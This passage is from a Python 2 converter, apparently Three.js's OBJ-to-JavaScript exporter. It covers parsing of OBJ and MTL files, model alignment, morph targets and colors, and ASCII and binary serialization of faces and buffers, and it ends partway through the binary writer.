    offsets = [box[axis][0] + (box[axis][1] - box[axis][0]) / 2.0
               for axis in ('x', 'y', 'z')]
    translate(vertices, [-offsets[0], -offsets[1], -offsets[2]])
def top(vertices):
    """Align top of the model with the floor (Y-axis) and center it around X and Z."""
    box = bbox(vertices)
    shift_x = box['x'][0] + (box['x'][1] - box['x'][0]) / 2.0
    shift_y = box['y'][1]  # top edge of the bounding box
    shift_z = box['z'][0] + (box['z'][1] - box['z'][0]) / 2.0
    translate(vertices, [-shift_x, -shift_y, -shift_z])
def bottom(vertices):
    """Align bottom of the model with the floor (Y-axis) and center it around X and Z."""
    box = bbox(vertices)
    shift_x = box['x'][0] + (box['x'][1] - box['x'][0]) / 2.0
    shift_y = box['y'][0]  # bottom edge of the bounding box
    shift_z = box['z'][0] + (box['z'][1] - box['z'][0]) / 2.0
    translate(vertices, [-shift_x, -shift_y, -shift_z])
def centerxz(vertices):
    """Center model around X and Z."""
    box = bbox(vertices)
    shift_x = box['x'][0] + (box['x'][1] - box['x'][0]) / 2.0
    shift_y = 0  # Y is left untouched
    shift_z = box['z'][0] + (box['z'][1] - box['z'][0]) / 2.0
    translate(vertices, [-shift_x, -shift_y, -shift_z])
def normalize(v):
    """Normalize a 3d vector in place (zero vectors are left untouched)."""
    length = math.sqrt(v[0] * v[0] + v[1] * v[1] + v[2] * v[2])
    if not length:
        return
    v[0] /= length
    v[1] /= length
    v[2] /= length
def veckey3(v):
    """Return a hashable key for a 3d vector, rounded to 6 decimal places."""
    return tuple(round(v[i], 6) for i in range(3))
# #####################################################
# MTL parser
# #####################################################
def texture_relative_path(fullpath):
    """Strip directories from a texture path, keeping just the file name."""
    return os.path.basename(fullpath)
def parse_mtl(fname):
    """Parse MTL file.

    Returns a dict mapping material name -> dict of Three.js-style
    properties (colors, specular coefficient, transparency, texture file
    names, optical density, illumination mode).

    NOTE(review): assumes every property line is preceded by a "newmtl"
    line; a property appearing first would hit an unbound `identifier`.
    Transparency interpretation depends on the module-level TRANSPARENCY
    setting ("invert" flips the value).
    """
    materials = {}
    for line in fileinput.input(fname):
        chunks = line.split()
        if len(chunks) > 0:
            # Material start
            # newmtl identifier
            if chunks[0] == "newmtl" and len(chunks) == 2:
                identifier = chunks[1]
                if not identifier in materials:
                    materials[identifier] = {}
            # Diffuse color
            # Kd 1.000 1.000 1.000
            if chunks[0] == "Kd" and len(chunks) == 4:
                materials[identifier]["colorDiffuse"] = [float(chunks[1]), float(chunks[2]), float(chunks[3])]
            # Ambient color
            # Ka 1.000 1.000 1.000
            if chunks[0] == "Ka" and len(chunks) == 4:
                materials[identifier]["colorAmbient"] = [float(chunks[1]), float(chunks[2]), float(chunks[3])]
            # Specular color
            # Ks 1.000 1.000 1.000
            if chunks[0] == "Ks" and len(chunks) == 4:
                materials[identifier]["colorSpecular"] = [float(chunks[1]), float(chunks[2]), float(chunks[3])]
            # Specular coefficient
            # Ns 154.000
            if chunks[0] == "Ns" and len(chunks) == 2:
                materials[identifier]["specularCoef"] = float(chunks[1])
            # Transparency
            # Tr 0.9 or d 0.9
            if (chunks[0] == "Tr" or chunks[0] == "d") and len(chunks) == 2:
                # TRANSPARENCY is a module-level option set from the command line
                if TRANSPARENCY == "invert":
                    materials[identifier]["transparency"] = 1.0 - float(chunks[1])
                else:
                    materials[identifier]["transparency"] = float(chunks[1])
            # Optical density
            # Ni 1.0
            if chunks[0] == "Ni" and len(chunks) == 2:
                materials[identifier]["opticalDensity"] = float(chunks[1])
            # Diffuse texture
            # map_Kd texture_diffuse.jpg
            if chunks[0] == "map_Kd" and len(chunks) == 2:
                materials[identifier]["mapDiffuse"] = texture_relative_path(chunks[1])
            # Ambient texture
            # map_Ka texture_ambient.jpg
            if chunks[0] == "map_Ka" and len(chunks) == 2:
                materials[identifier]["mapAmbient"] = texture_relative_path(chunks[1])
            # Specular texture
            # map_Ks texture_specular.jpg
            if chunks[0] == "map_Ks" and len(chunks) == 2:
                materials[identifier]["mapSpecular"] = texture_relative_path(chunks[1])
            # Alpha texture
            # map_d texture_alpha.png
            if chunks[0] == "map_d" and len(chunks) == 2:
                materials[identifier]["mapAlpha"] = texture_relative_path(chunks[1])
            # Bump texture
            # map_bump texture_bump.jpg or bump texture_bump.jpg
            if (chunks[0] == "map_bump" or chunks[0] == "bump") and len(chunks) == 2:
                materials[identifier]["mapBump"] = texture_relative_path(chunks[1])
            # Illumination
            # illum 2
            #
            # 0. Color on and Ambient off
            # 1. Color on and Ambient on
            # 2. Highlight on
            # 3. Reflection on and Ray trace on
            # 4. Transparency: Glass on, Reflection: Ray trace on
            # 5. Reflection: Fresnel on and Ray trace on
            # 6. Transparency: Refraction on, Reflection: Fresnel off and Ray trace on
            # 7. Transparency: Refraction on, Reflection: Fresnel on and Ray trace on
            # 8. Reflection on and Ray trace off
            # 9. Transparency: Glass on, Reflection: Ray trace off
            # 10. Casts shadows onto invisible surfaces
            if chunks[0] == "illum" and len(chunks) == 2:
                materials[identifier]["illumination"] = int(chunks[1])
    return materials
# #####################################################
# OBJ parser
# #####################################################
def parse_vertex(text):
    """Parse one OBJ face-vertex chunk.

    Accepted forms: "v", "v/t", "v/t/n", "v//n".  Missing texture or
    normal indices come back as 0.
    """
    fields = text.split("/")
    result = { 'v': int(fields[0]), 't': 0, 'n': 0 }
    if len(fields) > 1 and fields[1]:
        result['t'] = int(fields[1])
    if len(fields) > 2 and fields[2]:
        result['n'] = int(fields[2])
    return result
def parse_obj(fname):
    """Parse OBJ file.

    Returns (faces, vertices, uvs, normals, materials, mtllib):
      faces     -- list of dicts with 1-based index lists ('vertex', 'uv',
                   'normal') plus the material/group/object/smoothing
                   state that was active when the face appeared
      vertices  -- list of [x, y, z]
      uvs       -- list of [u, v, w] (w defaults to 0)
      normals   -- list of [x, y, z] (not necessarily unit length)
      materials -- dict: material name -> index of first use
      mtllib    -- referenced MTL file name, or "" if none
    """
    vertices = []
    normals = []
    uvs = []
    faces = []
    materials = {}
    mcounter = 0
    mcurrent = 0
    mtllib = ""
    # current face state
    group = 0
    object = 0  # NOTE(review): shadows the builtin `object` inside this function
    smooth = 0
    for line in fileinput.input(fname):
        chunks = line.split()
        if len(chunks) > 0:
            # Vertices as (x,y,z) coordinates
            # v 0.123 0.234 0.345
            if chunks[0] == "v" and len(chunks) == 4:
                x = float(chunks[1])
                y = float(chunks[2])
                z = float(chunks[3])
                vertices.append([x,y,z])
            # Normals in (x,y,z) form; normals might not be unit
            # vn 0.707 0.000 0.707
            if chunks[0] == "vn" and len(chunks) == 4:
                x = float(chunks[1])
                y = float(chunks[2])
                z = float(chunks[3])
                normals.append([x,y,z])
            # Texture coordinates in (u,v[,w]) coordinates, w is optional
            # vt 0.500 -1.352 [0.234]
            if chunks[0] == "vt" and len(chunks) >= 3:
                u = float(chunks[1])
                v = float(chunks[2])
                w = 0
                if len(chunks)>3:
                    w = float(chunks[3])
                uvs.append([u,v,w])
            # Face
            if chunks[0] == "f" and len(chunks) >= 4:
                vertex_index = []
                uv_index = []
                normal_index = []
                # each chunk is one "v[/t[/n]]" triple; zero entries are dropped
                for v in chunks[1:]:
                    vertex = parse_vertex(v)
                    if vertex['v']:
                        vertex_index.append(vertex['v'])
                    if vertex['t']:
                        uv_index.append(vertex['t'])
                    if vertex['n']:
                        normal_index.append(vertex['n'])
                faces.append({
                    'vertex':vertex_index,
                    'uv':uv_index,
                    'normal':normal_index,
                    'material':mcurrent,
                    'group':group,
                    'object':object,
                    'smooth':smooth,
                    })
            # Group
            if chunks[0] == "g" and len(chunks) == 2:
                group = chunks[1]
            # Object
            if chunks[0] == "o" and len(chunks) == 2:
                object = chunks[1]
            # Materials definition
            if chunks[0] == "mtllib" and len(chunks) == 2:
                mtllib = chunks[1]
            # Material
            if chunks[0] == "usemtl" and len(chunks) == 2:
                material = chunks[1]
                # materials are numbered in order of first appearance
                if not material in materials:
                    mcurrent = mcounter
                    materials[material] = mcounter
                    mcounter += 1
                else:
                    mcurrent = materials[material]
            # Smooth shading
            if chunks[0] == "s" and len(chunks) == 2:
                smooth = chunks[1]
    return faces, vertices, uvs, normals, materials, mtllib
# #####################################################
# Generator - faces
# #####################################################
def setBit(value, position, on):
    """Return value with the bit at `position` set (on truthy) or cleared."""
    if on:
        return value | (1 << position)
    return value & ~(1 << position)
def generate_face(f, fc):
    """Serialize one parsed face into the comma-separated Three.js ASCII
    face record: a bitmask header describing which fields follow, then
    the (0-based) index payload in a fixed order.

    f  -- face dict produced by parse_obj (1-based index lists)
    fc -- matching face from the color map; its material picks the baked
          face color when BAKE_COLORS is enabled
    """
    isTriangle = ( len(f['vertex']) == 3 )
    if isTriangle:
        nVertices = 3
    else:
        nVertices = 4
    hasMaterial = True # for the moment OBJs without materials get default material
    hasFaceUvs = False # not supported in OBJ
    hasFaceVertexUvs = ( len(f['uv']) >= nVertices )
    hasFaceNormals = False # don't export any face normals (as they are computed in engine)
    hasFaceVertexNormals = ( len(f["normal"]) >= nVertices and SHADING == "smooth" )
    hasFaceColors = BAKE_COLORS
    hasFaceVertexColors = False # not supported in OBJ
    faceType = 0
    faceType = setBit(faceType, 0, not isTriangle)
    faceType = setBit(faceType, 1, hasMaterial)
    faceType = setBit(faceType, 2, hasFaceUvs)
    faceType = setBit(faceType, 3, hasFaceVertexUvs)
    faceType = setBit(faceType, 4, hasFaceNormals)
    faceType = setBit(faceType, 5, hasFaceVertexNormals)
    faceType = setBit(faceType, 6, hasFaceColors)
    faceType = setBit(faceType, 7, hasFaceVertexColors)
    faceData = []
    # order is important, must match order in JSONLoader
    # face type
    # vertex indices
    # material index
    # face uvs index
    # face vertex uvs indices
    # face normal index
    # face vertex normals indices
    # face color index
    # face vertex colors indices
    faceData.append(faceType)
    # must clamp in case of polygons bigger than quads
    for i in xrange(nVertices):
        index = f['vertex'][i] - 1
        faceData.append(index)
    faceData.append( f['material'] )
    if hasFaceVertexUvs:
        for i in xrange(nVertices):
            index = f['uv'][i] - 1
            faceData.append(index)
    if hasFaceVertexNormals:
        for i in xrange(nVertices):
            index = f['normal'][i] - 1
            faceData.append(index)
    if hasFaceColors:
        index = fc['material']
        faceData.append(index)
    return ",".join( map(str, faceData) )
# #####################################################
# Generator - chunks
# #####################################################
def hexcolor(c):
    """Pack an RGB triplet of 0..1 floats into a single 0xRRGGBB integer."""
    red = int(c[0] * 255)
    green = int(c[1] * 255)
    blue = int(c[2] * 255)
    return (red << 16) + (green << 8) + blue
def generate_vertex(v, option_vertices_truncate, scale):
    """Format one vertex; when truncation is on, coordinates are
    pre-scaled and emitted with the truncating template."""
    if option_vertices_truncate:
        return TEMPLATE_VERTEX_TRUNCATE % (scale * v[0], scale * v[1], scale * v[2])
    return TEMPLATE_VERTEX % (v[0], v[1], v[2])
def generate_normal(n):
    """Format one normal with the module-level TEMPLATE_N pattern."""
    nx, ny, nz = n[0], n[1], n[2]
    return TEMPLATE_N % (nx, ny, nz)
def generate_uv(uv):
    """Format one UV pair, flipping V (1 - v) for the target convention."""
    u, v = uv[0], uv[1]
    return TEMPLATE_UV % (u, 1.0 - v)
def generate_color_rgb(c):
    """Format an RGB triplet with the module-level TEMPLATE_COLOR pattern."""
    red, green, blue = c[0], c[1], c[2]
    return TEMPLATE_COLOR % (red, green, blue)
def generate_color_decimal(c):
    """Format an RGB triplet as one packed decimal integer."""
    packed = hexcolor(c)
    return TEMPLATE_COLOR_DEC % packed
# #####################################################
# Morphs
# #####################################################
def generate_morph_vertex(name, vertices):
    """Emit one morph-target entry: its name plus the full vertex list."""
    formatted = [generate_vertex(v, TRUNCATE, SCALE) for v in vertices]
    return TEMPLATE_MORPH_VERTICES % (name, ",".join(formatted))
def generate_morph_color(name, colors):
    """Emit one morph-color entry: its name plus the face color list."""
    formatted = [generate_color_rgb(c) for c in colors]
    return TEMPLATE_MORPH_COLORS % (name, ",".join(formatted))
def extract_material_colors(materials, mtlfilename, basename):
    """Collect diffuse colors from the MTL materials, ordered by each
    material's OBJ index; a missing diffuse entry defaults to red."""
    if not materials:
        materials = { 'default': 0 }
    mtl = create_materials(materials, mtlfilename, basename)
    indexed = []
    for name in mtl:
        if name in materials:
            diffuse = mtl[name].get("colorDiffuse", [1,0,0])
            indexed.append([materials[name], diffuse])
    indexed.sort()
    return [entry[1] for entry in indexed]
def extract_face_colors(faces, material_colors):
    """Map each face to the diffuse color of its material index."""
    return [material_colors[face['material']] for face in faces]
def generate_morph_targets(morphfiles, n_vertices, infile):
    """Build the morph-targets payload from every OBJ matched by the
    space-separated glob patterns in `morphfiles`, sampling every
    FRAMESTEP-th match.  Morphs whose vertex count differs from the base
    model (n_vertices) are skipped with a warning.  Returns the joined
    template string ("" when nothing matched).
    """
    # NOTE(review): skipOriginalMorph is hardcoded False, so the filter
    # below ("or not skipOriginalMorph") currently always passes and the
    # original model is included as a morph of itself when matched.
    skipOriginalMorph = False
    norminfile = os.path.normpath(infile)
    morphVertexData = []
    for mfilepattern in morphfiles.split():
        matches = glob.glob(mfilepattern)
        matches.sort()
        indices = range(0, len(matches), FRAMESTEP)
        for i in indices:
            path = matches[i]
            normpath = os.path.normpath(path)
            if normpath != norminfile or not skipOriginalMorph:
                name = os.path.basename(normpath)
                morphFaces, morphVertices, morphUvs, morphNormals, morphMaterials, morphMtllib = parse_obj(normpath)
                n_morph_vertices = len(morphVertices)
                if n_vertices != n_morph_vertices:
                    print "WARNING: skipping morph [%s] with different number of vertices [%d] than the original model [%d]" % (name, n_morph_vertices, n_vertices)
                else:
                    # morphs must be aligned the same way as the base model
                    if ALIGN == "center":
                        center(morphVertices)
                    elif ALIGN == "centerxz":
                        centerxz(morphVertices)
                    elif ALIGN == "bottom":
                        bottom(morphVertices)
                    elif ALIGN == "top":
                        top(morphVertices)
                    morphVertexData.append((get_name(name), morphVertices))
                    print "adding [%s] with %d vertices" % (name, n_morph_vertices)
    morphTargets = ""
    if len(morphVertexData):
        morphTargets = "\n%s\n\t" % ",\n".join(generate_morph_vertex(name, vertices) for name, vertices in morphVertexData)
    return morphTargets
def generate_morph_colors(colorfiles, n_vertices, n_faces):
    """Build the morph-colors payload from every OBJ matched by the glob
    patterns in `colorfiles`.

    Color maps whose vertex or face counts differ from the base model
    are skipped with a warning.  Returns (morphColors, colorFaces,
    materialColors); the latter two come from the first accepted map and
    are used for baking face colors into the base model.
    """
    morphColorData = []
    colorFaces = []
    materialColors = []
    for mfilepattern in colorfiles.split():
        matches = glob.glob(mfilepattern)
        matches.sort()
        for path in matches:
            normpath = os.path.normpath(path)
            name = os.path.basename(normpath)
            morphFaces, morphVertices, morphUvs, morphNormals, morphMaterials, morphMtllib = parse_obj(normpath)
            n_morph_vertices = len(morphVertices)
            n_morph_faces = len(morphFaces)
            if n_vertices != n_morph_vertices:
                print "WARNING: skipping morph color map [%s] with different number of vertices [%d] than the original model [%d]" % (name, n_morph_vertices, n_vertices)
            elif n_faces != n_morph_faces:
                print "WARNING: skipping morph color map [%s] with different number of faces [%d] than the original model [%d]" % (name, n_morph_faces, n_faces)
            else:
                morphMaterialColors = extract_material_colors(morphMaterials, morphMtllib, normpath)
                morphFaceColors = extract_face_colors(morphFaces, morphMaterialColors)
                morphColorData.append((get_name(name), morphFaceColors))
                # take first color map for baking into face colors
                if len(colorFaces) == 0:
                    colorFaces = morphFaces
                    materialColors = morphMaterialColors
                print "adding [%s] with %d face colors" % (name, len(morphFaceColors))
    morphColors = ""
    if len(morphColorData):
        morphColors = "\n%s\n\t" % ",\n".join(generate_morph_color(name, colors) for name, colors in morphColorData)
    return morphColors, colorFaces, materialColors
# #####################################################
# Materials
# #####################################################
def generate_color(i):
    """Debug color for material index i.

    The first len(COLORS) indices draw from the hardcoded palette so the
    ordering is stable; beyond that, colors come from the PRNG, which
    callers must seed deterministically beforehand.
    """
    if i < len(COLORS):
        return COLORS[i]
    return int(0xffffff * random.random())
def value2string(v):
    """Render a Python value as JS source text.

    Strings are double-quoted unless they already look like a hex
    literal ("0x..."); booleans map to JS true/false; anything else
    falls back to str().
    """
    # bool is tested first for clarity; `type(v) == str` in the original
    # also failed for str subclasses, so use isinstance instead.
    if isinstance(v, bool):
        return str(v).lower()
    if isinstance(v, str) and not v.startswith("0x"):
        return '"%s"' % v
    return str(v)
def generate_materials(mtl, materials):
    """Build the JS materials array source string.

    Every MTL entry that the OBJ actually uses is serialized (keys
    sorted) with debug name/index/color attached, and the entries are
    emitted in material-index order so they line up with face records.
    """
    entries = []
    for name in mtl:
        if name not in materials:
            continue
        index = materials[name]
        props = mtl[name]
        # debug info: original name, OBJ first-use index, stable color
        props['DbgName'] = name
        props['DbgIndex'] = index
        props['DbgColor'] = generate_color(index)
        if BAKE_COLORS:
            props['vertexColors'] = "face"
        body = ",\n".join('\t"%s" : %s' % (key, value2string(val))
                          for key, val in sorted(props.items()))
        entries.append([index, "\t{\n%s\n\t}" % body])
    return ",\n\n".join(text for index, text in sorted(entries))
def generate_mtl(materials):
    """Fabricate placeholder material entries (debug info only) for use
    when no MTL file is available."""
    mtl = {}
    for name, index in materials.items():
        mtl[name] = {
            'DbgName': name,
            'DbgIndex': index,
            'DbgColor': generate_color(index)
        }
    return mtl
def generate_materials_string(materials, mtlfilename, basename):
    """Resolve the OBJ materials against the MTL file and render the
    final JS materials array (a default material covers the no-material
    case)."""
    if not materials:
        materials = { 'default': 0 }
    mtl = create_materials(materials, mtlfilename, basename)
    return generate_materials(mtl, materials)
def create_materials(materials, mtlfilename, basename):
    """Parse MTL file and create mapping between its materials and OBJ materials.
    Eventual edge cases are handled here (missing materials, missing MTL file).

    materials   -- dict: OBJ material name -> index
    mtlfilename -- MTL file referenced by the OBJ ("" when absent)
    basename    -- OBJ path; its directory locates the MTL file
    Returns dict: material name -> property dict.
    """
    random.seed(42) # to get well defined color order for debug colors
    # default materials with debug colors for when
    # there is no specified MTL / MTL loading failed,
    # or if there were no materials / null materials
    mtl = generate_mtl(materials)
    if mtlfilename:
        # create full pathname for MTL (included from OBJ)
        path = os.path.dirname(basename)
        fname = os.path.join(path, mtlfilename)
        if file_exists(fname):
            # override default materials with real ones from MTL
            # (where they exist, otherwise keep defaults)
            mtl.update(parse_mtl(fname))
        else:
            print "Couldn't find [%s]" % fname
    return mtl
# #####################################################
# Faces
# #####################################################
def is_triangle_flat(f):
    """Triangle, flat shaded (no usable normals), no UVs."""
    if len(f['vertex']) != 3:
        return False
    return not (f["normal"] and SHADING == "smooth") and not f['uv']
def is_triangle_flat_uv(f):
    """Triangle, flat shaded, one UV per vertex."""
    if len(f['vertex']) != 3:
        return False
    return not (f["normal"] and SHADING == "smooth") and len(f['uv']) == 3
def is_triangle_smooth(f):
    """Triangle, smooth shaded (normals present, smooth mode), no UVs."""
    if len(f['vertex']) != 3:
        return False
    return f["normal"] and SHADING == "smooth" and not f['uv']
def is_triangle_smooth_uv(f):
    """Triangle, smooth shaded, one UV per vertex."""
    if len(f['vertex']) != 3:
        return False
    return f["normal"] and SHADING == "smooth" and len(f['uv']) == 3
def is_quad_flat(f):
    """Quad, flat shaded, no UVs."""
    if len(f['vertex']) != 4:
        return False
    return not (f["normal"] and SHADING == "smooth") and not f['uv']
def is_quad_flat_uv(f):
    """Quad, flat shaded, one UV per vertex."""
    if len(f['vertex']) != 4:
        return False
    return not (f["normal"] and SHADING == "smooth") and len(f['uv']) == 4
def is_quad_smooth(f):
    """Quad, smooth shaded, no UVs."""
    if len(f['vertex']) != 4:
        return False
    return f["normal"] and SHADING == "smooth" and not f['uv']
def is_quad_smooth_uv(f):
    """Quad, smooth shaded, one UV per vertex."""
    if len(f['vertex']) != 4:
        return False
    return f["normal"] and SHADING == "smooth" and len(f['uv']) == 4
def sort_faces(faces):
    """Bucket faces into the eight categories the binary format stores
    separately; classification order matches the original if/elif chain,
    and faces matching no category are dropped."""
    classifiers = [
        ('triangles_flat', is_triangle_flat),
        ('triangles_flat_uv', is_triangle_flat_uv),
        ('triangles_smooth', is_triangle_smooth),
        ('triangles_smooth_uv', is_triangle_smooth_uv),
        ('quads_flat', is_quad_flat),
        ('quads_flat_uv', is_quad_flat_uv),
        ('quads_smooth', is_quad_smooth),
        ('quads_smooth_uv', is_quad_smooth_uv),
    ]
    data = dict((key, []) for key, _ in classifiers)
    for f in faces:
        for key, matches in classifiers:
            if matches(f):
                data[key].append(f)
                break
    return data
# #####################################################
# API - ASCII converter
# #####################################################
def convert_ascii(infile, morphfiles, colorfiles, outfile):
    """Convert infile.obj to outfile.js
    Here is where everything happens. If you need to automate conversions,
    just import this file as Python module and call this method.

    infile     -- source OBJ path
    morphfiles -- space-separated glob patterns for morph-target OBJs
    colorfiles -- space-separated glob patterns for morph-color OBJs
    outfile    -- destination JS path
    Uses the module-level ALIGN/SHADING/BAKE_COLORS/TRUNCATE/SCALE options.
    """
    if not file_exists(infile):
        print "Couldn't find [%s]" % infile
        return
    # parse OBJ / MTL files
    faces, vertices, uvs, normals, materials, mtllib = parse_obj(infile)
    n_vertices = len(vertices)
    n_faces = len(faces)
    # align model
    if ALIGN == "center":
        center(vertices)
    elif ALIGN == "centerxz":
        centerxz(vertices)
    elif ALIGN == "bottom":
        bottom(vertices)
    elif ALIGN == "top":
        top(vertices)
    # generate normals string
    nnormal = 0
    normals_string = ""
    if SHADING == "smooth":
        normals_string = ",".join(generate_normal(n) for n in normals)
        nnormal = len(normals)
    # extract morph vertices
    morphTargets = generate_morph_targets(morphfiles, n_vertices, infile)
    # extract morph colors
    morphColors, colorFaces, materialColors = generate_morph_colors(colorfiles, n_vertices, n_faces)
    # generate colors string
    ncolor = 0
    colors_string = ""
    # fall back to the base model's own materials when no usable color map matched
    if len(colorFaces) < len(faces):
        colorFaces = faces
        materialColors = extract_material_colors(materials, mtllib, infile)
    if BAKE_COLORS:
        colors_string = ",".join(generate_color_decimal(c) for c in materialColors)
        ncolor = len(materialColors)
    # generate ascii model string
    text = TEMPLATE_FILE_ASCII % {
    "name"      : get_name(outfile),
    "fname"     : os.path.basename(infile),
    "nvertex"   : len(vertices),
    "nface"     : len(faces),
    "nuv"       : len(uvs),
    "nnormal"   : nnormal,
    "ncolor"    : ncolor,
    "nmaterial" : len(materials),
    "materials" : generate_materials_string(materials, mtllib, infile),
    "normals"       : normals_string,
    "colors"        : colors_string,
    "uvs"           : ",".join(generate_uv(uv) for uv in uvs),
    "vertices"      : ",".join(generate_vertex(v, TRUNCATE, SCALE) for v in vertices),
    "morphTargets"  : morphTargets,
    "morphColors"   : morphColors,
    "faces"     : ",".join(generate_face(f, fc) for f, fc in zip(faces, colorFaces)),
    "scale"     : SCALE
    }
    out = open(outfile, "w")
    out.write(text)
    out.close()
    print "%d vertices, %d faces, %d materials" % (len(vertices), len(faces), len(materials))
# #############################################################################
# API - Binary converter
# #############################################################################
def dump_materials_to_buffer(faces, buffer):
    """Append each face's material index as a little-endian uint16."""
    for face in faces:
        buffer.append(struct.pack('<H', face['material']))
def dump_vertices3_to_buffer(faces, buffer):
    """Append each triangle's three vertex indices, converted from the
    OBJ 1-based convention to 0-based, as little-endian uint32s."""
    for face in faces:
        a, b, c = face['vertex'][0], face['vertex'][1], face['vertex'][2]
        buffer.append(struct.pack('<III', a - 1, b - 1, c - 1))
def dump_vertices4_to_buffer(faces, buffer):
    """Append each quad's four vertex indices (0-based) as little-endian
    uint32s."""
    for face in faces:
        zero_based = [i - 1 for i in face['vertex'][:4]]
        buffer.append(struct.pack('<IIII', *zero_based))
def dump_normals3_to_buffer(faces, buffer):
    """Append each triangle's three normal indices (0-based) as
    little-endian uint32s."""
    for face in faces:
        na, nb, nc = face['normal'][0], face['normal'][1], face['normal'][2]
        buffer.append(struct.pack('<III', na - 1, nb - 1, nc - 1))
def dump_normals4_to_buffer(faces, buffer):
    """Append each quad's four normal indices (0-based) as little-endian
    uint32s."""
    for face in faces:
        zero_based = [i - 1 for i in face['normal'][:4]]
        buffer.append(struct.pack('<IIII', *zero_based))
def dump_uvs3_to_buffer(faces, buffer):
    """Append each triangle's three UV indices (0-based) as little-endian
    uint32s."""
    for face in faces:
        ua, ub, uc = face['uv'][0], face['uv'][1], face['uv'][2]
        buffer.append(struct.pack('<III', ua - 1, ub - 1, uc - 1))
def dump_uvs4_to_buffer(faces, buffer):
    """Append each quad's four UV indices (0-based) as little-endian
    uint32s."""
    for face in faces:
        zero_based = [i - 1 for i in face['uv'][:4]]
        buffer.append(struct.pack('<IIII', *zero_based))
def add_padding(buffer, n):
    """Append zero bytes so a section that is n bytes long ends on a
    4-byte boundary; a multiple of 4 gets no padding."""
    remainder = n % 4
    if remainder:
        pad_byte = struct.pack('<B', 0)
        for _ in range(4 - remainder):
            buffer.append(pad_byte)
def convert_binary(infile, outfile):
    """Convert infile.obj to outfile.js + outfile.bin

    Writes a small JS descriptor (counts + materials + buffer name) and a
    binary buffer: header, vertices, quantized normals, UVs, then the
    eight face categories in a fixed order, each 4-byte aligned.  Uses
    the module-level ALIGN/SHADING options.  NOTE(review): this writer
    relies on Python 2 str-as-bytes semantics ("".join of packed data
    written to a "wb" file).
    """
    if not file_exists(infile):
        print "Couldn't find [%s]" % infile
        return
    binfile = get_name(outfile) + ".bin"
    faces, vertices, uvs, normals, materials, mtllib = parse_obj(infile)
    if ALIGN == "center":
        center(vertices)
    elif ALIGN == "centerxz":
        centerxz(vertices)
    elif ALIGN == "bottom":
        bottom(vertices)
    elif ALIGN == "top":
        top(vertices)
    sfaces = sort_faces(faces)
    if SHADING == "smooth":
        nnormals = len(normals)
    else:
        nnormals = 0
    # ###################
    # generate JS file
    # ###################
    text = TEMPLATE_FILE_BIN % {
    "name"       : get_name(outfile),
    "materials" : generate_materials_string(materials, mtllib, infile),
    "buffers"   : binfile,
    "fname"     : os.path.basename(infile),
    "nvertex"   : len(vertices),
    "nface"     : len(faces),
    "nmaterial" : len(materials),
    "nnormal"   : nnormals,
    "nuv"       : len(uvs)
    }
    out = open(outfile, "w")
    out.write(text)
    out.close()
    # ###################
    # generate BIN file
    # ###################
    buffer = []
    # header
    # ------
    header_bytes  = struct.calcsize('<12s')
    header_bytes += struct.calcsize('<BBBBBBBB')
    header_bytes += struct.calcsize('<IIIIIIIIIII')
    # signature
    signature = struct.pack('<12s', 'Three.js 003')
    # metadata (all data is little-endian)
    vertex_coordinate_bytes = 4
    normal_coordinate_bytes = 1
    uv_coordinate_bytes = 4
    vertex_index_bytes = 4
    normal_index_bytes = 4
    uv_index_bytes = 4
    material_index_bytes = 2
    # header_bytes            unsigned char   1
    # vertex_coordinate_bytes unsigned char   1
    # normal_coordinate_bytes unsigned char   1
    # uv_coordinate_bytes     unsigned char   1
    # vertex_index_bytes      unsigned char   1
    # normal_index_bytes      unsigned char   1
    # uv_index_bytes          unsigned char   1
    # material_index_bytes    unsigned char   1
    bdata = struct.pack('<BBBBBBBB', header_bytes,
                        vertex_coordinate_bytes,
                        normal_coordinate_bytes,
                        uv_coordinate_bytes,
                        vertex_index_bytes,
                        normal_index_bytes,
                        uv_index_bytes,
                        material_index_bytes)
    ntri_flat = len(sfaces['triangles_flat'])
    ntri_smooth = len(sfaces['triangles_smooth'])
    ntri_flat_uv = len(sfaces['triangles_flat_uv'])
    ntri_smooth_uv = len(sfaces['triangles_smooth_uv'])
    nquad_flat = len(sfaces['quads_flat'])
    nquad_smooth = len(sfaces['quads_smooth'])
    nquad_flat_uv = len(sfaces['quads_flat_uv'])
    nquad_smooth_uv = len(sfaces['quads_smooth_uv'])
    # nvertices       unsigned int    4
    # nnormals        unsigned int    4
    # nuvs            unsigned int    4
    # ntri_flat       unsigned int    4
    # ntri_smooth     unsigned int    4
    # ntri_flat_uv    unsigned int    4
    # ntri_smooth_uv  unsigned int    4
    # nquad_flat      unsigned int    4
    # nquad_smooth    unsigned int    4
    # nquad_flat_uv   unsigned int    4
    # nquad_smooth_uv unsigned int    4
    ndata = struct.pack('<IIIIIIIIIII', len(vertices),
                        nnormals,
                        len(uvs),
                        ntri_flat,
                        ntri_smooth,
                        ntri_flat_uv,
                        ntri_smooth_uv,
                        nquad_flat,
                        nquad_smooth,
                        nquad_flat_uv,
                        nquad_smooth_uv)
    buffer.append(signature)
    buffer.append(bdata)
    buffer.append(ndata)
    # 1. vertices
    # ------------
    # x float   4
    # y float   4
    # z float   4
    for v in vertices:
        data = struct.pack('<fff', v[0], v[1], v[2])
        buffer.append(data)
    # 2. normals
    # ---------------
    # x signed char 1
    # y signed char 1
    # z signed char 1
    if SHADING == "smooth":
        # normals are normalized then quantized to signed bytes (-127..127)
        for n in normals:
            normalize(n)
            data = struct.pack('<bbb', math.floor(n[0]*127+0.5),
                               math.floor(n[1]*127+0.5),
                               math.floor(n[2]*127+0.5))
            buffer.append(data)
        add_padding(buffer, nnormals * 3)
    # 3. uvs
    # -----------
    # u float   4
    # v float   4
    for uv in uvs:
        data = struct.pack('<ff', uv[0], 1.0-uv[1])
        buffer.append(data)
    # padding
    #data = struct.pack('<BB', 0, 0)
    #buffer.append(data)
    # 4. flat triangles (vertices + materials)
    # ------------------
    # a unsigned int   4
    # b unsigned int   4
    # c unsigned int   4
    # ------------------
    # m unsigned short 2
    dump_vertices3_to_buffer(sfaces['triangles_flat'], buffer)
    dump_materials_to_buffer(sfaces['triangles_flat'], buffer)
    add_padding(buffer, ntri_flat * 2)
    # 5. smooth triangles (vertices + materials + normals)
    # -------------------
    # a  unsigned int   4
    # b  unsigned int   4
    # c  unsigned int   4
    # -------------------
    # na unsigned int   4
    # nb unsigned int   4
    # nc unsigned int   4
    # -------------------
    # m  unsigned short 2
    dump_vertices3_to_buffer(sfaces['triangles_smooth'], buffer)
    dump_normals3_to_buffer(sfaces['triangles_smooth'], buffer)
    dump_materials_to_buffer(sfaces['triangles_smooth'], buffer)
    add_padding(buffer, ntri_smooth * 2)
